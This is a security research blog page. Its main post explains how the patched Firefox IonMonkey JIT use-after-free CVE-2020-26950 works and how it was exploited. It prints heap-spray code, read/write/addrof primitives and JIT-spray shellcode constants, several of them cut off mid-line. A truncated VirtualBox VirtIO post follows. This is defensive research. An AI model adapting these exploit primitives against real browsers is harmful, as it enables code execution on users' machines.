Normal view

There are new articles available, click to refresh the page.
Before yesterdaySentinelLabs

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.

Contents

Introduction

At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications and improvements to allocators, lazy generation, and garbage collection simply wasn’t enough to make it so. Fast forward to 2008 and Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp
ret

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge amount of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i 

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:

Use-after-free

The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
 
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}
 
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}
 
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f)or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}
 
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}
 
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
 
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
 
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i 

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straight forward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often have a whole number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then that would mean that a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has less than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.

Reallocating

In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
 
   new cons(); // Trigger the vulnerability - Reallocates the object slots
 
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
  
   // Avoid Elements Copy-On-Write by pushing a value
   target.push(i);
  
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
 
   // Return the corrupted array
   return target;
}
 
/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
 
   // We'll create one object...
   var cons = function() {};
   for(i=0; i

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Being in the tenured heap means that the ArrayBuffer object itself will be inaccessible as it is in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and have thus created a separate arena for them:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}

arg(1,2);

Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}

arg(1);

To avoid needing to separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
 
// Global that holds the target argument so it can be used later
arg = 0;
 
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
 
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
 
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
 
       // If it was null, then we return and try the next one
       return 0;
   }
 
   // Get the cons value
   let cons = arguments[0][arguments[1]];
 
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
 
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
 
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
 
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
 
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
 
   // Otherwise just return 0 and try the next one
   return 0;
}
 
/*
   main - Performs the exploit
*/
function main() {
   ...
 
   //
   TOTAL=arr.length;
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
}

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
 
   // Used to hold the leaked data
   let val = 0;
  
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
   for(let i = 32; i >= 0; i--) {
       val = val = 0; i--) {
       val[0] = val[0] 

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straight forward by iterating backwards from the RareArgumentsData pointer (As ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards) that was leaked using the corrupted array:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
 
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation
   while(counter 

The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
 
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter
   while(counter 

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
  
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;
   for(i=0;i

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i 

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
   return (BigInt(fake_arrbuf[1] & 0xffff) 

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

/*
   shellcode - Constant values which hold our shellcode to pop xcalc.
*/
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}
 
/*
   main - Performs the exploit
*/
function main() {
   for(i = 0;i 

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon! pic.twitter.com/g6K9tuK4UG

— maxpl0it (@maxpl0it) February 1, 2022

Conclusion

Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives were found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

GSOh No! Hunting for Vulnerabilities in VirtualBox Network Offloads

23 November 2021 at 11:56

Introduction

The Pwn2Own contest is like Christmas for me. It’s an exciting competition which involves rummaging around to find critical vulnerabilities in the most commonly used (and often the most difficult) software in the world. Back in March, I was preparing to have a pop at the Vancouver contest and had decided to take a break from writing browser fuzzers to try something different: VirtualBox.

Virtualization is an incredibly interesting target. The complexity involved in both emulating hardware devices and passing data safely to real hardware is astounding. And as the mantra goes: where there is complexity, there are bugs.

For Pwn2Own, it was a safe bet to target an emulated component. In my eyes, network hardware emulation seemed like the right (and usual) route to go. I started with a default component: the NAT emulation code in /src/VBox/Devices/Network/DrvNAT.cpp.

At the time, I just wanted to get a feel for the code, so there was no specific methodical approach to this other than scrolling through the file and reading various parts.

During my scrolling adventure, I landed on something that caught my eye:

static DECLCALLBACK(void) drvNATSendWorker(PDRVNAT pThis, PPDMSCATTERGATHER pSgBuf)
{
#if 0 /* Assertion happens often to me after resuming a VM -- no time to investigate this now. */
   Assert(pThis->enmLinkState == PDMNETWORKLINKSTATE_UP);
#endif
   if (pThis->enmLinkState == PDMNETWORKLINKSTATE_UP)
   {
       struct mbuf *m = (struct mbuf *)pSgBuf->pvAllocator;
       if (m)
       {
           /*
            * A normal frame.
            */
           pSgBuf->pvAllocator = NULL;
           slirp_input(pThis->pNATState, m, pSgBuf->cbUsed);
       }
       else
       {
           /*
            * GSO frame, need to segment it.
            */
           /** @todo Make the NAT engine grok large frames?  Could be more efficient... */
#if 0 /* this is for testing PDMNetGsoCarveSegmentQD. */
           uint8_t         abHdrScratch[256];
#endif
           uint8_t const  *pbFrame = (uint8_t const *)pSgBuf->aSegs[0].pvSeg;
           PCPDMNETWORKGSO pGso    = (PCPDMNETWORKGSO)pSgBuf->pvUser;
           uint32_t const  cSegs   = PDMNetGsoCalcSegmentCount(pGso, pSgBuf->cbUsed);  Assert(cSegs > 1);
           for (uint32_t iSeg = 0; iSeg pNATState, pGso->cbHdrsTotal + pGso->cbMaxSeg, &pvSeg, &cbSeg);
               if (!m)
                   break;
 
#if 1
               uint32_t cbPayload, cbHdrs;
               uint32_t offPayload = PDMNetGsoCarveSegment(pGso, pbFrame, pSgBuf->cbUsed,
                                                           iSeg, cSegs, (uint8_t *)pvSeg, &cbHdrs, &cbPayload);
               memcpy((uint8_t *)pvSeg + cbHdrs, pbFrame + offPayload, cbPayload);
 
               slirp_input(pThis->pNATState, m, cbPayload + cbHdrs);
#else
...

The function used for sending packets from the guest to the network contained a separate code path for Generic Segmentation Offload (GSO) frames and was using memcpy to combine pieces of data.

The next question was of course “How much of this can I control?” and after going through various code paths and writing a simple Python-based constraint solver for all the limiting factors, the answer was “More than I expected” when using the Paravirtualization Network device called VirtIO.

Paravirtualized Networking

An alternative to fully emulating a device is to use paravirtualization. Unlike full virtualization, in which the guest is entirely unaware that it is a guest, paravirtualization has the guest install drivers that are aware that they are running in a guest machine in order to work with the host to transfer data in a much faster and more efficient manner.

VirtIO is an interface that can be used to develop paravirtualized drivers. One such driver is virtio-net, which comes with the Linux source and is used for networking. VirtualBox, like a number of other virtualization software, supports this as a network adapter:

The Adapter Type options

Similarly to the e1000, VirtIO networking works by using ring buffers to transfer data between the guest and the host (In this case called Virtqueues, or VQueues). However, unlike the e1000, VirtIO doesn’t use a single ring with head and tail registers for transmitting but instead uses three separate arrays:

  • A Descriptor array that contains the following data per-descriptor:
    • Address – The physical address of the data being transferred.
    • Length – The length of data at the address.
    • Flags – Flags that determine whether the Next field is in-use and whether the buffer is read or write.
    • Next – Used when there is chaining.
  • An Available ring – An array that contains indexes into the Descriptor array that are in use and can be read by the host.
  • A Used ring – An array of indexes into the Descriptor array that have been read by the host.

This looks as so:

When the guest wishes to send packets to the network, it adds an entry to the descriptor table, adds the index of this descriptor to the Available ring, and then increments the Available Index pointer:

Once this is done, the guest ‘kicks’ the host by writing the VQueue index to the Queue Notify register. This triggers the host to begin handling descriptors in the available ring. Once a descriptor has been processed, it is added to the Used ring and the Used Index is incremented:

Generic Segmentation Offload

Next, some background on GSO is required. To understand the need for GSO, it’s important to understand the problem that it solves for network cards.

Originally the CPU would handle all of the heavy lifting when calculating transport layer checksums or segmenting them into smaller ethernet packet sizes. Since this process can be quite slow when dealing with a lot of outgoing network traffic, hardware manufacturers started implementing offloading for these operations, thus removing the strain on the operating system.

For segmentation, this meant that instead of the OS having to pass a number of much smaller packets through the network stack, the OS just passes a single packet once.

It was noticed that this optimization could be applied to other protocols (beyond TCP and UDP) without the need of hardware support by delaying segmentation until just before the network driver receives the message. This resulted in GSO being created.

Since VirtIO is a paravirtualized device, the driver is aware that it is in a guest machine and so GSO can be applied between the guest and host. GSO is implemented in VirtIO by adding a context descriptor header to the start of the network buffer. This header can be seen in the following struct:

struct VNetHdr
{
   uint8_t  u8Flags;
   uint8_t  u8GSOType;
   uint16_t u16HdrLen;
   uint16_t u16GSOSize;
   uint16_t u16CSumStart;
   uint16_t u16CSumOffset;
};

The VirtIO header can be thought of as a similar concept to the Context Descriptor in e1000.

When this header is received, the parameters are verified for some level of validity in vnetR3ReadHeader. Then the function vnetR3SetupGsoCtx is used to fill the standard GSO struct used by VirtualBox across all network devices:

typedef struct PDMNETWORKGSO
{
   /** The type of segmentation offloading we're performing (PDMNETWORKGSOTYPE). */
   uint8_t             u8Type;
   /** The total header size. */
   uint8_t             cbHdrsTotal;
